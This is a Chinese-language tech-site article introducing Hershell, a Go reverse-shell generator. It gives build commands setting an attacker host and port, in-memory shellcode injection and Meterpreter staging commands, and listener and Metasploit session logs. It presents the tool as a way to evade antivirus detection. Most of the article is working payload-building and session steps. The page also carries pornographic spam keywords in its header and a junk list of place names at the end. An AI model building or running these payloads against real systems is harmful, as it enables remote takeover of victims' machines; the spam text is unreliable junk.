亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Hershell是一款什么生成器

發布時間:2021-12-27 14:14:56 來源:億速云 閱讀:140 作者:小新 欄目:網絡安全

小編給大家分享一下Hershell是一款什么生成器,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!

Hershell是一款功能強大的跨平臺反向Shell生成器,該工具使用Go語言開發,基于TCP反向Shell實現其功能。

該工具使用了TLS來保障數據通訊的安全性,并且提供了證書公共密鑰指紋綁定功能來防止通信數據被攔截。

Hershell是一款什么生成器

支持的系統

Hershell的當前版本支持以下操作系統:

Windows

Linux

macOS

FreeBSD

開發目的

雖然Meterpreter Payload有時也能用,但是這種方法很容易被反病毒產品檢測到。因此,Hershell便應運而生,它可以給我們提供一個基于TCP的反向Shell,而且能夠支持各種不同的操作系統平臺。

工具使用&依賴組件

Hershell使用Go語言開發,我們首先需要按照Go官方手冊在我們的設備上完成Go環境的搭建,并設置好$GOPATH環境變量。

接下來,運行下列命令來獲取項目源碼:

go get github.com/lesnuages/hershell

構建Payload

在構建Payload時,我們可以選擇使用已提供的Makefile來完成構建。此時,我們需要設置以下環境變量:

GOOS : 目標操作系統

GOARCH : 目標架構

LHOST : 攻擊者IP或主機域名

LPORT : 監聽器端口

當然了,我們也在Makefile中提供了一些可供參考的變量值:

depends : 生成服務器證書(反向Shell需要使用到)

windows32 : 構建一個32位Windows可執行程序(PE 32位)

windows64 : 構建一個64位Windows可執行程序(PE 64位)

linux32 : 構建一個32位Linux可執行程序(ELF 32位)

linux64 : 構建一個64位Linux可執行程序(ELF 64位)

macos32 : 構建一個32位macOS可執行程序(Mach-O)

macos64 : 構建一個64位macOS可執行程序(Mach-O)

針對上述列表中的目標平臺,我們還需要設置LHOST和LPORT這兩個環境變量。

使用反向Shell

代碼開始執行之后,工具將給我們提供一個遠程Shell,它是一個自定義的交互式Shell,允許我們通過Windows上的cmd.exe或Unix設備中的/bin/sh來執行系統命令。

Hershell支持的部分特定命令如下表所示:

run_shell : 獲取系統Shell

inject <base64 shellcode> : 向相同進程內存中注入一個shellcode(Base64編碼),并執行代碼。

meterpreter [tcp|http|https] IP:PORT :與多個處理器建立連接并從Metasploit獲取第二階段的反向TCP、HTTP或HTTPS Meterpreter,然后在內存中執行Shellcode(該功能目前僅支持Windows平臺)。

exit : 退出程序

工具使用

首先,我們需要使用下面的命令生成一個有效的證書:

$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'-----
cat server.key >> server.pem

針對Windows平臺:

# Predifined 32 bit target$ make windows32 LHOST=192.168.0.12 LPORT=1234# Predifined 64 bit target$ make windows64 LHOST=192.168.0.12 LPORT=1234

針對Linux平臺:

# Predifined 32 bit target$ make linux32 LHOST=192.168.0.12 LPORT=1234# Predifined 64 bit target$ make linux64 LHOST=192.168.0.12 LPORT=1234

針對macOS平臺:

$ make macos LHOST=192.168.0.12 LPORT=1234

工具使用樣例

基礎使用

我們可以使用各種工具來處理傳入的連接,比如說:

socat

ncat

openssl服務器模塊

Metasploit的各種handler (python/shell_reverse_tcp_ssl payload)

下面是ncat的使用樣例:

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

Meterpreter場景

注意:目前該功能僅支持在Windows平臺上使用。

該工具的Meterpreter使用場景目前僅支持下列Payload:

windows/meterpreter/reverse_tcp

windows/x64/meterpreter/reverse_tcp

windows/meterpreter/reverse_http

windows/x64/meterpreter/reverse_http

windows/meterpreter/reverse_https

windows/x64/meterpreter/reverse_https

當你選擇使用某個Payload之后,別忘了選擇正確的傳輸端口(tcp、http或https)。

MeterpreterHandler使用樣例如下:

[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

接下來,在hershell中,使用meterpreter命令:

[hershell]> meterpreter https 172.16.122.105:8443

此時,我們將能夠在msfconsole中獲取到新的Meterpreter會話:

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

以上是“Hershell是一款什么生成器”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業資訊頻道!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

濉溪县| 隆德县| 莒南县| 东宁县| 象州县| 蒙城县| 阳原县| 饶阳县| 安吉县| 出国| 墨竹工卡县| 遵化市| 博乐市| 永年县| 牡丹江市| 肥西县| 成都市| 镇远县| 巴楚县| 武山县| 于都县| 许昌县| 安远县| 黑龙江省| 启东市| 叙永县| 常宁市| 宁津县| 井陉县| 邵阳县| 沁源县| 镇远县| 黄浦区| 宜兰市| 平度市| 吴旗县| 南江县| 吕梁市| 新田县| 类乌齐县| 虞城县|